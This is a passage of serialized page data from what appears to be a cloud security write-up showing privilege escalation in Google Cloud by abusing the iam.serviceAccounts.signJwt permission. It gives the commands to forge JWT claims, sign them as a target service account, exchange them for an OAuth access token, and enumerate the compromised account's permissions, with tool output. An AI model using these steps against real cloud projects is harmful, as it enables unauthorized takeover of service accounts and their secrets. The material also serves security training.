privileges.",{"type":32,"tag":39,"props":2290,"children":2292},{"id":2291},"abusing-iamserviceaccountssignjwt",[2293],{"type":37,"value":2294},"Abusing iam.serviceAccounts.signJwt",{"type":32,"tag":46,"props":2296,"children":2297},{},[2298,2300,2309],{"type":37,"value":2299},"The permission ",{"type":32,"tag":2301,"props":2302,"children":2303},"strong",{},[2304],{"type":32,"tag":104,"props":2305,"children":2307},{"className":2306},[],[2308],{"type":37,"value":1360},{"type":37,"value":2310}," in Google Cloud allows a user or service to use a private key associated with a service account to sign a JSON Web Token (JWT).",{"type":32,"tag":46,"props":2312,"children":2313},{},[2314],{"type":37,"value":2315},"There are different use cases:",{"type":32,"tag":238,"props":2317,"children":2318},{},[2319,2329,2339],{"type":32,"tag":242,"props":2320,"children":2321},{},[2322,2327],{"type":32,"tag":2301,"props":2323,"children":2324},{},[2325],{"type":37,"value":2326},"Inter-service Authentication",{"type":37,"value":2328},": A service can generate a signed JWT to authenticate with other services.",{"type":32,"tag":242,"props":2330,"children":2331},{},[2332,2337],{"type":32,"tag":2301,"props":2333,"children":2334},{},[2335],{"type":37,"value":2336},"Temporary Access",{"type":37,"value":2338},": Generation of OAuth2 tokens based on a JWT to access Google APIs.",{"type":32,"tag":242,"props":2340,"children":2341},{},[2342,2347],{"type":32,"tag":2301,"props":2343,"children":2344},{},[2345],{"type":37,"value":2346},"OpenID Connect Authentication",{"type":37,"value":2348},": Used to prove the service account's identity to third-party services.",{"type":32,"tag":46,"props":2350,"children":2351},{},[2352,2354,2359],{"type":37,"value":2353},"What interests us is the second part - it is possible to create an OAuth2 token from a JWT to access the Google API, which will allow us to gain control over the ",{"type":32,"tag":104,"props":2355,"children":2357},{"className":2356},[],[2358],{"type":37,"value":2286},{"type":37,"value":2360}," service account.",{"type":32,"tag":46,"props":2362,"children":2363},{},[2364,2366,2372,2374],{"type":37,"value":2365},"Currently we are the freshly compromised service account thanks to implicit delegation: ",{"type":32,"tag":104,"props":2367,"children":2369},{"className":2368},[],[2370],{"type":37,"value":2371},"analytics@gr-proj-4.iam.gserviceaccount.com",{"type":37,"value":2373},", and our target will be the service account ",{"type":32,"tag":104,"props":2375,"children":2377},{"className":2376},[],[2378],{"type":37,"value":2379},"platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":32,"tag":46,"props":2381,"children":2382},{},[2383],{"type":37,"value":2384},"First, we need to create our data part of our JWT like this:",{"type":32,"tag":113,"props":2386,"children":2387},{"lang":115},[2388],{"type":32,"tag":118,"props":2389,"children":2391},{"className":120,"code":2390,"language":115,"meta":7,"style":7},"export IAT=$(date +%s)\nexport EXP=$(($IAT + 3600))\ncat > claims.json \u003C\u003CEOF\n{\n\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n\"aud\": \"https://oauth2.googleapis.com/token\",\n\"exp\": $EXP,\n\"iat\": $IAT\n}\nEOF\n",[2392],{"type":32,"tag":104,"props":2393,"children":2394},{"__ignoreMap":7},[2395,2427,2459,2487,2494,2502,2510,2518,2526,2534,2541],{"type":32,"tag":127,"props":2396,"children":2397},{"class":129,"line":130},[2398,2402,2407,2412,2417,2422],{"type":32,"tag":127,"props":2399,"children":2400},{"style":299},[2401],{"type":37,"value":302},{"type":32,"tag":127,"props":2403,"children":2404},{"style":305},[2405],{"type":37,"value":2406}," IAT",{"type":32,"tag":127,"props":2408,"children":2409},{"style":311},[2410],{"type":37,"value":2411},"=$(",{"type":32,"tag":127,"props":2413,"children":2414},{"style":134},[2415],{"type":37,"value":2416},"date",{"type":32,"tag":127,"props":2418,"children":2419},{"style":139},[2420],{"type":37,"value":2421}," +%s",{"type":32,"tag":127,"props":2423,"children":2424},{"style":311},[2425],{"type":37,"value":2426},")\n",{"type":32,"tag":127,"props":2428,"children":2429},{"class":129,"line":361},[2430,2434,2439,2444,2449,2454],{"type":32,"tag":127,"props":2431,"children":2432},{"style":299},[2433],{"type":37,"value":302},{"type":32,"tag":127,"props":2435,"children":2436},{"style":305},[2437],{"type":37,"value":2438}," EXP",{"type":32,"tag":127,"props":2440,"children":2441},{"style":311},[2442],{"type":37,"value":2443},"=$((",{"type":32,"tag":127,"props":2445,"children":2446},{"style":305},[2447],{"type":37,"value":2448},"$IAT",{"type":32,"tag":127,"props":2450,"children":2451},{"style":322},[2452],{"type":37,"value":2453}," + 3600",{"type":32,"tag":127,"props":2455,"children":2456},{"style":311},[2457],{"type":37,"value":2458},"))\n",{"type":32,"tag":127,"props":2460,"children":2461},{"class":129,"line":402},[2462,2467,2472,2477,2482],{"type":32,"tag":127,"props":2463,"children":2464},{"style":134},[2465],{"type":37,"value":2466},"cat",{"type":32,"tag":127,"props":2468,"children":2469},{"style":299},[2470],{"type":37,"value":2471}," >",{"type":32,"tag":127,"props":2473,"children":2474},{"style":139},[2475],{"type":37,"value":2476}," claims.json",{"type":32,"tag":127,"props":2478,"children":2479},{"style":299},[2480],{"type":37,"value":2481}," \u003C\u003C",{"type":32,"tag":127,"props":2483,"children":2484},{"style":675},[2485],{"type":37,"value":2486},"EOF\n",{"type":32,"tag":127,"props":2488,"children":2489},{"class":129,"line":738},[2490],{"type":32,"tag":127,"props":2491,"children":2492},{"style":139},[2493],{"type":37,"value":649},{"type":32,"tag":127,"props":2495,"children":2496},{"class":129,"line":764},[2497],{"type":32,"tag":127,"props":2498,"children":2499},{"style":139},[2500],{"type":37,"value":2501},"\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n",{"type":32,"tag":127,"props":2503,"children":2504},{"class":129,"line":803},[2505],{"type":32,"tag":127,"props":2506,"children":2507},{"style":139},[2508],{"type":37,"value":2509},"\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n",{"type":32,"tag":127,"props":2511,"children":2512},{"class":129,"line":838},[2513],{"type":32,"tag":127,"props":2514,"children":2515},{"style":139},[2516],{"type":37,"value":2517},"\"aud\": \"https://oauth2.googleapis.com/token\",\n",{"type":32,"tag":127,"props":2519,"children":2520},{"class":129,"line":847},[2521],{"type":32,"tag":127,"props":2522,"children":2523},{"style":139},[2524],{"type":37,"value":2525},"\"exp\": $EXP,\n",{"type":32,"tag":127,"props":2527,"children":2528},{"class":129,"line":975},[2529],{"type":32,"tag":127,"props":2530,"children":2531},{"style":139},[2532],{"type":37,"value":2533},"\"iat\": $IAT\n",{"type":32,"tag":127,"props":2535,"children":2536},{"class":129,"line":987},[2537],{"type":32,"tag":127,"props":2538,"children":2539},{"style":139},[2540],{"type":37,"value":853},{"type":32,"tag":127,"props":2542,"children":2543},{"class":129,"line":1000},[2544],{"type":32,"tag":127,"props":2545,"children":2546},{"style":675},[2547],{"type":37,"value":2486},{"type":32,"tag":46,"props":2549,"children":2550},{},[2551],{"type":37,"value":2552},"Here are the details of the JWT payload section:",{"type":32,"tag":238,"props":2554,"children":2555},{},[2556,2584,2609,2641,2655],{"type":32,"tag":242,"props":2557,"children":2558},{},[2559,2568,2570,2576],{"type":32,"tag":2301,"props":2560,"children":2561},{},[2562],{"type":32,"tag":104,"props":2563,"children":2565},{"className":2564},[],[2566],{"type":37,"value":2567},"iss",{"type":37,"value":2569}," – ",{"type":32,"tag":2571,"props":2572,"children":2573},"em",{},[2574],{"type":37,"value":2575},"Issuer",{"type":32,"tag":238,"props":2577,"children":2578},{},[2579],{"type":32,"tag":242,"props":2580,"children":2581},{},[2582],{"type":37,"value":2583},"The service account email address. This indicates who generated the JWT",{"type":32,"tag":242,"props":2585,"children":2586},{},[2587,2595,2596,2601],{"type":32,"tag":2301,"props":2588,"children":2589},{},[2590],{"type":32,"tag":104,"props":2591,"children":2593},{"className":2592},[],[2594],{"type":37,"value":1973},{"type":37,"value":2569},{"type":32,"tag":2571,"props":2597,"children":2598},{},[2599],{"type":37,"value":2600},"Access Scope",{"type":32,"tag":238,"props":2602,"children":2603},{},[2604],{"type":32,"tag":242,"props":2605,"children":2606},{},[2607],{"type":37,"value":2608},"One or more URLs indicating the requested permissions, used to specify which services or APIs in Google Cloud we want to use",{"type":32,"tag":242,"props":2610,"children":2611},{},[2612,2621,2622,2627],{"type":32,"tag":2301,"props":2613,"children":2614},{},[2615],{"type":32,"tag":104,"props":2616,"children":2618},{"className":2617},[],[2619],{"type":37,"value":2620},"aud",{"type":37,"value":2569},{"type":32,"tag":2571,"props":2623,"children":2624},{},[2625],{"type":37,"value":2626},"Audience",{"type":32,"tag":238,"props":2628,"children":2629},{},[2630],{"type":32,"tag":242,"props":2631,"children":2632},{},[2633,2635],{"type":37,"value":2634},"Google's OAuth2 endpoint URL, which specifies the intended recipient service of the JWT, in this case Google OAuth to obtain an ",{"type":32,"tag":104,"props":2636,"children":2638},{"className":2637},[],[2639],{"type":37,"value":2640},"access_token",{"type":32,"tag":242,"props":2642,"children":2643},{},[2644,2653],{"type":32,"tag":2301,"props":2645,"children":2646},{},[2647],{"type":32,"tag":104,"props":2648,"children":2650},{"className":2649},[],[2651],{"type":37,"value":2652},"exp",{"type":37,"value":2654}," – Expiration Time",{"type":32,"tag":242,"props":2656,"children":2657},{},[2658,2667],{"type":32,"tag":2301,"props":2659,"children":2660},{},[2661],{"type":32,"tag":104,"props":2662,"children":2664},{"className":2663},[],[2665],{"type":37,"value":2666},"iat",{"type":37,"value":2668}," – Issued At Time",{"type":32,"tag":46,"props":2670,"children":2671},{},[2672],{"type":37,"value":2673},"Then we will sign our JWT using the target service account:",{"type":32,"tag":113,"props":2675,"children":2676},{"lang":115},[2677],{"type":32,"tag":118,"props":2678,"children":2680},{"className":120,"code":2679,"language":115,"meta":7,"style":7},"gcloud iam service-accounts sign-jwt claims.json signed-jwt.txt \\\n  --iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",[2681],{"type":32,"tag":104,"props":2682,"children":2683},{"__ignoreMap":7},[2684,2720],{"type":32,"tag":127,"props":2685,"children":2686},{"class":129,"line":130},[2687,2691,2696,2701,2706,2710,2715],{"type":32,"tag":127,"props":2688,"children":2689},{"style":134},[2690],{"type":37,"value":109},{"type":32,"tag":127,"props":2692,"children":2693},{"style":139},[2694],{"type":37,"value":2695}," iam",{"type":32,"tag":127,"props":2697,"children":2698},{"style":139},[2699],{"type":37,"value":2700}," service-accounts",{"type":32,"tag":127,"props":2702,"children":2703},{"style":139},[2704],{"type":37,"value":2705}," sign-jwt",{"type":32,"tag":127,"props":2707,"children":2708},{"style":139},[2709],{"type":37,"value":2476},{"type":32,"tag":127,"props":2711,"children":2712},{"style":139},[2713],{"type":37,"value":2714}," signed-jwt.txt",{"type":32,"tag":127,"props":2716,"children":2717},{"style":150},[2718],{"type":37,"value":2719}," \\\n",{"type":32,"tag":127,"props":2721,"children":2722},{"class":129,"line":361},[2723],{"type":32,"tag":127,"props":2724,"children":2725},{"style":150},[2726],{"type":37,"value":2727},"  --iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":46,"props":2729,"children":2730},{},[2731,2733,2738,2740,2745,2747,2752],{"type":37,"value":2732},"This command is launched from a service account ",{"type":32,"tag":104,"props":2734,"children":2736},{"className":2735},[],[2737],{"type":37,"value":2253},{"type":37,"value":2739},", which has been authorized via IAM to perform the action ",{"type":32,"tag":104,"props":2741,"children":2743},{"className":2742},[],[2744],{"type":37,"value":1360},{"type":37,"value":2746}," on the service account ",{"type":32,"tag":104,"props":2748,"children":2750},{"className":2749},[],[2751],{"type":37,"value":2286},{"type":37,"value":214},{"type":32,"tag":46,"props":2754,"children":2755},{},[2756],{"type":37,"value":2757},"This means that:",{"type":32,"tag":238,"props":2759,"children":2760},{},[2761,2779],{"type":32,"tag":242,"props":2762,"children":2763},{},[2764,2766,2771,2773,2778],{"type":37,"value":2765},"The ",{"type":32,"tag":104,"props":2767,"children":2769},{"className":2768},[],[2770],{"type":37,"value":2253},{"type":37,"value":2772}," account does not have the private key of ",{"type":32,"tag":104,"props":2774,"children":2776},{"className":2775},[],[2777],{"type":37,"value":2286},{"type":37,"value":214},{"type":32,"tag":242,"props":2780,"children":2781},{},[2782,2784,2789],{"type":37,"value":2783},"But it has the right to ask Google IAM to sign a JWT on its behalf, as if ",{"type":32,"tag":104,"props":2785,"children":2787},{"className":2786},[],[2788],{"type":37,"value":2286},{"type":37,"value":2790}," was doing it.",{"type":32,"tag":46,"props":2792,"children":2793},{},[2794],{"type":37,"value":2795},"To explain the command parameters in more detail:",{"type":32,"tag":238,"props":2797,"children":2798},{},[2799,2817,2834],{"type":32,"tag":242,"props":2800,"children":2801},{},[2802,2808,2810,2815],{"type":32,"tag":104,"props":2803,"children":2805},{"className":2804},[],[2806],{"type":37,"value":2807},"claims.json",{"type":37,"value":2809},"→ Input file containing the ",{"type":32,"tag":2301,"props":2811,"children":2812},{},[2813],{"type":37,"value":2814},"data",{"type":37,"value":2816}," of the JWT to be signed (JSON format).",{"type":32,"tag":242,"props":2818,"children":2819},{},[2820,2826,2828,2833],{"type":32,"tag":104,"props":2821,"children":2823},{"className":2822},[],[2824],{"type":37,"value":2825},"signed-jwt.txt",{"type":37,"value":2827},"→ Output file that will contain the ",{"type":32,"tag":2301,"props":2829,"children":2830},{},[2831],{"type":37,"value":2832},"signed JWT",{"type":37,"value":214},{"type":32,"tag":242,"props":2835,"children":2836},{},[2837,2843,2845,2850,2852,2857],{"type":32,"tag":104,"props":2838,"children":2840},{"className":2839},[],[2841],{"type":37,"value":2842},"--iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":37,"value":2844},"→ Indicates that ",{"type":32,"tag":2301,"props":2846,"children":2847},{},[2848],{"type":37,"value":2849},"this service account",{"type":37,"value":2851}," (",{"type":32,"tag":104,"props":2853,"children":2855},{"className":2854},[],[2856],{"type":37,"value":2286},{"type":37,"value":2858},") should sign the JWT.",{"type":32,"tag":46,"props":2860,"children":2861},{},[2862],{"type":37,"value":2863},"Then we will be able to use this JWT to claim an access token that will allow us to gain access to the target service account.",{"type":32,"tag":113,"props":2865,"children":2866},{"lang":115},[2867],{"type":32,"tag":118,"props":2868,"children":2870},{"className":120,"code":2869,"language":115,"meta":7,"style":7},"curl -s -X POST https://oauth2.googleapis.com/token \\\n-H \"Content-Type: application/x-www-form-urlencoded\" \\\n-d \"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=$(cat signed-jwt.txt)\" \\\n| jq -r .access_token\nya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[2871],{"type":32,"tag":104,"props":2872,"children":2873},{"__ignoreMap":7},[2874,2906,2931,2974,2997],{"type":32,"tag":127,"props":2875,"children":2876},{"class":129,"line":130},[2877,2882,2887,2892,2897,2902],{"type":32,"tag":127,"props":2878,"children":2879},{"style":134},[2880],{"type":37,"value":2881},"curl",{"type":32,"tag":127,"props":2883,"children":2884},{"style":150},[2885],{"type":37,"value":2886}," -s",{"type":32,"tag":127,"props":2888,"children":2889},{"style":150},[2890],{"type":37,"value":2891}," -X",{"type":32,"tag":127,"props":2893,"children":2894},{"style":139},[2895],{"type":37,"value":2896}," POST",{"type":32,"tag":127,"props":2898,"children":2899},{"style":139},[2900],{"type":37,"value":2901}," https://oauth2.googleapis.com/token",{"type":32,"tag":127,"props":2903,"children":2904},{"style":150},[2905],{"type":37,"value":2719},{"type":32,"tag":127,"props":2907,"children":2908},{"class":129,"line":361},[2909,2914,2918,2923,2927],{"type":32,"tag":127,"props":2910,"children":2911},{"style":322},[2912],{"type":37,"value":2913},"-H ",{"type":32,"tag":127,"props":2915,"children":2916},{"style":675},[2917],{"type":37,"value":668},{"type":32,"tag":127,"props":2919,"children":2920},{"style":139},[2921],{"type":37,"value":2922},"Content-Type: application/x-www-form-urlencoded",{"type":32,"tag":127,"props":2924,"children":2925},{"style":675},[2926],{"type":37,"value":668},{"type":32,"tag":127,"props":2928,"children":2929},{"style":150},[2930],{"type":37,"value":2719},{"type":32,"tag":127,"props":2932,"children":2933},{"class":129,"line":402},[2934,2939,2943,2948,2953,2957,2961,2966,2970],{"type":32,"tag":127,"props":2935,"children":2936},{"style":322},[2937],{"type":37,"value":2938},"-d ",{"type":32,"tag":127,"props":2940,"children":2941},{"style":675},[2942],{"type":37,"value":668},{"type":32,"tag":127,"props":2944,"children":2945},{"style":139},[2946],{"type":37,"value":2947},"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=",{"type":32,"tag":127,"props":2949,"children":2950},{"style":311},[2951],{"type":37,"value":2952},"$(",{"type":32,"tag":127,"props":2954,"children":2955},{"style":134},[2956],{"type":37,"value":2466},{"type":32,"tag":127,"props":2958,"children":2959},{"style":139},[2960],{"type":37,"value":2714},{"type":32,"tag":127,"props":2962,"children":2963},{"style":311},[2964],{"type":37,"value":2965},")",{"type":32,"tag":127,"props":2967,"children":2968},{"style":675},[2969],{"type":37,"value":668},{"type":32,"tag":127,"props":2971,"children":2972},{"style":150},[2973],{"type":37,"value":2719},{"type":32,"tag":127,"props":2975,"children":2976},{"class":129,"line":738},[2977,2982,2987,2992],{"type":32,"tag":127,"props":2978,"children":2979},{"style":299},[2980],{"type":37,"value":2981},"|",{"type":32,"tag":127,"props":2983,"children":2984},{"style":134},[2985],{"type":37,"value":2986}," jq",{"type":32,"tag":127,"props":2988,"children":2989},{"style":150},[2990],{"type":37,"value":2991}," -r",{"type":32,"tag":127,"props":2993,"children":2994},{"style":139},[2995],{"type":37,"value":2996}," .access_token\n",{"type":32,"tag":127,"props":2998,"children":2999},{"class":129,"line":764},[3000],{"type":32,"tag":127,"props":3001,"children":3002},{"style":134},[3003],{"type":37,"value":3004},"ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",{"type":32,"tag":46,"props":3006,"children":3007},{},[3008,3010,3015],{"type":37,"value":3009},"We can use the retrieved access token and begin enumerating the newly compromised service account (",{"type":32,"tag":104,"props":3011,"children":3013},{"className":3012},[],[3014],{"type":37,"value":2379},{"type":37,"value":3016},") with cliam:",{"type":32,"tag":113,"props":3018,"children":3019},{"lang":115},[3020],{"type":32,"tag":118,"props":3021,"children":3023},{"className":120,"code":3022,"language":115,"meta":7,"style":7},"cliam gcp --access-token=\"$CLOUDSDK_AUTH_ACCESS_TOKEN\"  --project-id gr-proj-4 bruteforce\nApr 04 00:38:49 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:38:54 INF ● compute.acceleratorTypes=get\nApr 04 00:38:54 INF ● compute.acceleratorTypes=list\nApr 04 00:38:54 INF ● compute.addresses=get\nApr 04 00:38:54 INF ● compute.addresses=list\nApr 04 00:38:54 INF ● compute.autoscalers=get\n[...SNIP...]\nApr 04 00:38:54 INF ● compute.zoneOperations=get\nApr 04 00:38:54 INF ● compute.zoneOperations=get-iam-policy\nApr 04 00:38:54 INF ● compute.zoneOperations=list\nApr 04 00:38:54 INF ● compute.zones=get\nApr 04 00:38:54 INF ● compute.zones=list\nApr 04 00:38:56 INF ● resourcemanager.projects=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get-iam-policy\nApr 04 00:38:56 INF ● secretmanager.secrets=list\nApr 04 00:38:57 INF ● run.routes=invoke\nApr 04 00:38:57 INF ● serviceusage.quotas=get\nApr 04 00:38:57 INF ● serviceusage.services=get\nApr 04 00:38:57 INF ● serviceusage.services=list\n",[3024],{"type":32,"tag":104,"props":3025,"children":3026},{"__ignoreMap":7},[3027,3069,3105,3134,3162,3190,3218,3246,3262,3290,3318,3346,3374,3402,3431,3459,3487,3515,3544,3572,3600],{"type":32,"tag":127,"props":3028,"children":3029},{"class":129,"line":130},[3030,3034,3038,3043,3047,3052,3056,3061,3065],{"type":32,"tag":127,"props":3031,"children":3032},{"style":134},[3033],{"type":37,"value":467},{"type":32,"tag":127,"props":3035,"children":3036},{"style":139},[3037],{"type":37,"value":491},{"type":32,"tag":127,"props":3039,"children":3040},{"style":150},[3041],{"type":37,"value":3042}," --access-token=",{"type":32,"tag":127,"props":3044,"children":3045},{"style":675},[3046],{"type":37,"value":668},{"type":32,"tag":127,"props":3048,"children":3049},{"style":139},[3050],{"type":37,"value":3051},"$CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":32,"tag":127,"props":3053,"children":3054},{"style":675},[3055],{"type":37,"value":668},{"type":32,"tag":127,"props":3057,"children":3058},{"style":150},[3059],{"type":37,"value":3060},"  --project-id",{"type":32,"tag":127,"props":3062,"children":3063},{"style":139},[3064],{"type":37,"value":506},{"type":32,"tag":127,"props":3066,"children":3067},{"style":139},[3068],{"type":37,"value":511},{"type":32,"tag":127,"props":3070,"children":3071},{"class":129,"line":361},[3072,3076,3080,3085,3089,3093,3097,3101],{"type":32,"tag":127,"props":3073,"children":3074},{"style":134},[3075],{"type":37,"value":519},{"type":32,"tag":127,"props":3077,"children":3078},{"style":522},[3079],{"type":37,"value":525},{"type":32,"tag":127,"props":3081,"children":3082},{"style":139},[3083],{"type":37,"value":3084}," 00:38:49",{"type":32,"tag":127,"props":3086,"children":3087},{"style":139},[3088],{"type":37,"value":535},{"type":32,"tag":127,"props":3090,"children":3091},{"style":139},[3092],{"type":37,"value":540},{"type":32,"tag":127,"props":3094,"children":3095},{"style":139},[3096],{"type":37,"value":545},{"type":32,"tag":127,"props":3098,"children":3099},{"style":139},[3100],{"type":37,"value":550},{"type":32,"tag":127,"props":3102,"children":3103},{"style":139},[3104],{"type":37,"value":555},{"type":32,"tag":127,"props":3106,"children":3107},{"class":129,"line":402},[3108,3112,3116,3121,3125,3129],{"type":32,"tag":127,"props":3109,"children":3110},{"style":134},[3111],{"type":37,"value":519},{"type":32,"tag":127,"props":3113,"children":3114},{"style":522},[3115],{"type":37,"value":525},{"type":32,"tag":127,"props":3117,"children":3118},{"style":139},[3119],{"type":37,"value":3120}," 00:38:54",{"type":32,"tag":127,"props":3122,"children":3123},{"style":139},[3124],{"type":37,"value":576},{"type":32,"tag":127,"props":3126,"children":3127},{"style":139},[3128],{"type":37,"value":540},{"type":32,"tag":127,"props":3130,"children":3131},{"style":139},[3132],{"type":37,"value":3133}," compute.acceleratorTypes=get\n",{"type":32,"tag":127,"props":3135,"children":3136},{"class":129,"line":738},[3137,3141,3145,3149,3153,3157],{"type":32,"tag":127,"props":3138,"children":3139},{"style":134},[3140],{"type":37,"value":519},{"type":32,"tag":127,"props":3142,"children":3143},{"style":522},[3144],{"type":37,"value":525},{"type":32,"tag":127,"props":3146,"children":3147},{"style":139},[3148],{"type":37,"value":3120},{"type":32,"tag":127,"props":3150,"children":3151},{"style":139},[3152],{"type":37,"value":576},{"type":32,"tag":127,"props":3154,"children":3155},{"style":139},[3156],{"type":37,"value":540},{"type":32,"tag":127,"props":3158,"children":3159},{"style":139},[3160],{"type":37,"value":3161}," compute.acceleratorTypes=list\n",{"type":32,"tag":127,"props":3163,"children":3164},{"class":129,"line":764},[3165,3169,3173,3177,3181,3185],{"type":32,"tag":127,"props":3166,"children":3167},{"style":134},[3168],{"type":37,"value":519},{"type":32,"tag":127,"props":3170,"children":3171},{"style":522},[3172],{"type":37,"value":525},{"type":32,"tag":127,"props":3174,"children":3175},{"style":139},[3176],{"type":37,"value":3120},{"type":32,"tag":127,"props":3178,"children":3179},{"style":139},[3180],{"type":37,"value":576},{"type":32,"tag":127,"props":3182,"children":3183},{"style":139},[3184],{"type":37,"value":540},{"type":32,"tag":127,"props":3186,"children":3187},{"style":139},[3188],{"type":37,"value":3189}," compute.addresses=get\n",{"type":32,"tag":127,"props":3191,"children":3192},{"class":129,"line":803},[3193,3197,3201,3205,3209,3213],{"type":32,"tag":127,"props":3194,"children":3195},{"style":134},[3196],{"type":37,"value":519},{"type":32,"tag":127,"props":3198,"children":3199},{"style":522},[3200],{"type":37,"value":525},{"type":32,"tag":127,"props":3202,"children":3203},{"style":139},[3204],{"type":37,"value":3120},{"type":32,"tag":127,"props":3206,"children":3207},{"style":139},[3208],{"type":37,"value":576},{"type":32,"tag":127,"props":3210,"children":3211},{"style":139},[3212],{"type":37,"value":540},{"type":32,"tag":127,"props":3214,"children":3215},{"style":139},[3216],{"type":37,"value":3217}," compute.addresses=list\n",{"type":32,"tag":127,"props":3219,"children":3220},{"class":129,"line":838},[3221,3225,3229,3233,3237,3241],{"type":32,"tag":127,"props":3222,"children":3223},{"style":134},[3224],{"type":37,"value":519},{"type":32,"tag":127,"props":3226,"children":3227},{"style":522},[3228],{"type":37,"value":525},{"type":32,"tag":127,"props":3230,"children":3231},{"style":139},[3232],{"type":37,"value":3120},{"type":32,"tag":127,"props":3234,"children":3235},{"style":139},[3236],{"type":37,"value":576},{"type":32,"tag":127,"props":3238,"children":3239},{"style":139},[3240],{"type":37,"value":540},{"type":32,"tag":127,"props":3242,"children":3243},{"style":139},[3244],{"type":37,"value":3245}," compute.autoscalers=get\n",{"type":32,"tag":127,"props":3247,"children":3248},{"class":129,"line":847},[3249,3253,3257],{"type":32,"tag":127,"props":3250,"children":3251},{"style":311},[3252],{"type":37,"value":343},{"type":32,"tag":127,"props":3254,"children":3255},{"style":322},[3256],{"type":37,"value":348},{"type":32,"tag":127,"props":3258,"children":3259},{"style":311},[3260],{"type":37,"value":3261},"]\n",{"type":32,"tag":127,"props":3263,"children":3264},{"class":129,"line":975},[3265,3269,3273,3277,3281,3285],{"type":32,"tag":127,"props":3266,"children":3267},{"style":134},[3268],{"type":37,"value":519},{"type":32,"tag":127,"props":3270,"children":3271},{"style":522},[3272],{"type":37,"value":525},{"type":32,"tag":127,"props":3274,"children":3275},{"style":139},[3276],{"type":37,"value":3120},{"type":32,"tag":127,"props":3278,"children":3279},{"style":139},[3280],{"type":37,"value":576},{"type":32,"tag":127,"props":3282,"children":3283},{"style":139},[3284],{"type":37,"value":540},{"type":32,"tag":127,"props":3286,"children":3287},{"style":139},[3288],{"type":37,"value":3289}," compute.zoneOperations=get\n",{"type":32,"tag":127,"props":3291,"children":3292},{"class":129,"line":987},[3293,3297,3301,3305,3309,3313],{"type":32,"tag":127,"props":3294,"children":3295},{"style":134},[3296],{"type":37,"value":519},{"type":32,"tag":127,"props":3298,"children":3299},{"style":522},[3300],{"type":37,"value":525},{"type":32,"tag":127,"props":3302,"children":3303},{"style":139},[3304],{"type":37,"value":3120},{"type":32,"tag":127,"props":3306,"children":3307},{"style":139},[3308],{"type":37,"value":576},{"type":32,"tag":127,"props":3310,"children":3311},{"style":139},[3312],{"type":37,"value":540},{"type":32,"tag":127,"props":3314,"children":3315},{"style":139},[3316],{"type":37,"value":3317}," compute.zoneOperations=get-iam-policy\n",{"type":32,"tag":127,"props":3319,"children":3320},{"class":129,"line":1000},[3321,3325,3329,3333,3337,3341],{"type":32,"tag":127,"props":3322,"children":3323},{"style":134},[3324],{"type":37,"value":519},{"type":32,"tag":127,"props":3326,"children":3327},{"style":522},[3328],{"type":37,"value":525},{"type":32,"tag":127,"props":3330,"children":3331},{"style":139},[3332],{"type":37,"value":3120},{"type":32,"tag":127,"props":3334,"children":3335},{"style":139},[3336],{"type":37,"value":576},{"type":32,"tag":127,"props":3338,"children":3339},{"style":139},[3340],{"type":37,"value":540},{"type":32,"tag":127,"props":3342,"children":3343},{"style":139},[3344],{"type":37,"value":3345}," compute.zoneOperations=list\n",{"type":32,"tag":127,"props":3347,"children":3348},{"class":129,"line":1013},[3349,3353,3357,3361,3365,3369],{"type":32,"tag":127,"props":3350,"children":3351},{"style":134},[3352],{"type":37,"value":519},{"type":32,"tag":127,"props":3354,"children":3355},{"style":522},[3356],{"type":37,"value":525},{"type":32,"tag":127,"props":3358,"children":3359},{"style":139},[3360],{"type":37,"value":3120},{"type":32,"tag":127,"props":3362,"children":3363},{"style":139},[3364],{"type":37,"value":576},{"type":32,"tag":127,"props":3366,"children":3367},{"style":139},[3368],{"type":37,"value":540},{"type":32,"tag":127,"props":3370,"children":3371},{"style":139},[3372],{"type":37,"value":3373}," compute.zones=get\n",{"type":32,"tag":127,"props":3375,"children":3376},{"class":129,"line":1025},[3377,3381,3385,3389,3393,3397],{"type":32,"tag":127,"props":3378,"children":3379},{"style":134},[3380],{"type":37,"value":519},{"type":32,"tag":127,"props":3382,"children":3383},{"style":522},[3384],{"type":37,"value":525},{"type":32,"tag":127,"props":3386,"children":3387},{"style":139},[3388],{"type":37,"value":3120},{"type":32,"tag":127,"props":3390,"children":3391},{"style":139},[3392],{"type":37,"value":576},{"type":32,"tag":127,"props":3394,"children":3395},{"style":139},[3396],{"type":37,"value":540},{"type":32,"tag":127,"props":3398,"children":3399},{"style":139},[3400],{"type":37,"value":3401}," compute.zones=list\n",{"type":32,"tag":127,"props":3403,"children":3404},{"class":129,"line":1037},[3405,3409,3413,3418,3422,3426],{"type":32,"tag":127,"props":3406,"children":3407},{"style":134},[3408],{"type":37,"value":519},{"type":32,"tag":127,"props":3410,"children":3411},{"style":522},[3412],{"type":37,"value":525},{"type":32,"tag":127,"props":3414,"children":3415},{"style":139},[3416],{"type":37,"value":3417}," 00:38:56",{"type":32,"tag":127,"props":3419,"children":3420},{"style":139},[3421],{"type":37,"value":576},{"type":32,"tag":127,"props":3423,"children":3424},{"style":139},[3425],{"type":37,"value":540},{"type":32,"tag":127,"props":3427,"children":3428},{"style":139},[3429],{"type":37,"value":3430}," 